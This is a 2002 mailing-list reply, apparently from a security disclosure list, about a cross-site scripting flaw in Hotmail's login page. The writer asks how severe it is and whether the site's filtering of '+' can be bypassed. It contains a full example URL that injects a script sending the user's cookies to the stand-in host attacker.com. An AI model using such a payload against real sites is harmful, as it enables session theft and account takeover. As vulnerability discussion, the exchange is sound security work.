Hello, comments below: On Mon, 7 Oct 2002, Thor Larholm wrote: > It's very simple, you can inject arbitrary scripting to be executed by the > user in the context of hotmail. This means that you can e.g. steal his > cookies or, if he's logged in, write emails from his account, delete his > mails and change his password. > I'm not sure this is the case (severity)... Hotmail strips +'s and %2B's from GET requests. While you can view your own cookies easily, I'm not sure if you can still exploit this bug. I do know filtering these characters prevents this sort of attack: http://lc2.law5.hotmail.passport.com/cgi-bin/login?_lang=&id=2&fs=1&cb=";><script>document.location.replace('http://attacker.com/steal.cgi?'+document.cookie);</script>&ct=1033054530&_setlang= Is there another way to exploit this which I am not seeing? Or does MSN actually have their act together (in this particular case...)? -Russell P.S. Well, I suppose the real question may be this: Is there a way to concatenate javascript strings without "+" or "%2B"? On Mon, 7 Oct 2002, Thor Larholm wrote: > > From: Peter Rdam [mailto:hell@weedmail.com] > > They didnt reacted, and im pretty curious about what > > is possible with the bug. And i actually hope that > > someone can tell me about it and maybe Microsoft will > > do something about it.. > > It's very simple, you can inject arbitrary scripting to be executed by the > user in the context of hotmail. This means that you can e.g. steal his > cookies or, if he's logged in, write emails from his account, delete his > mails and change his password. > > > > Regards > Thor Larholm > Jubii A/S - Internet Programmer >
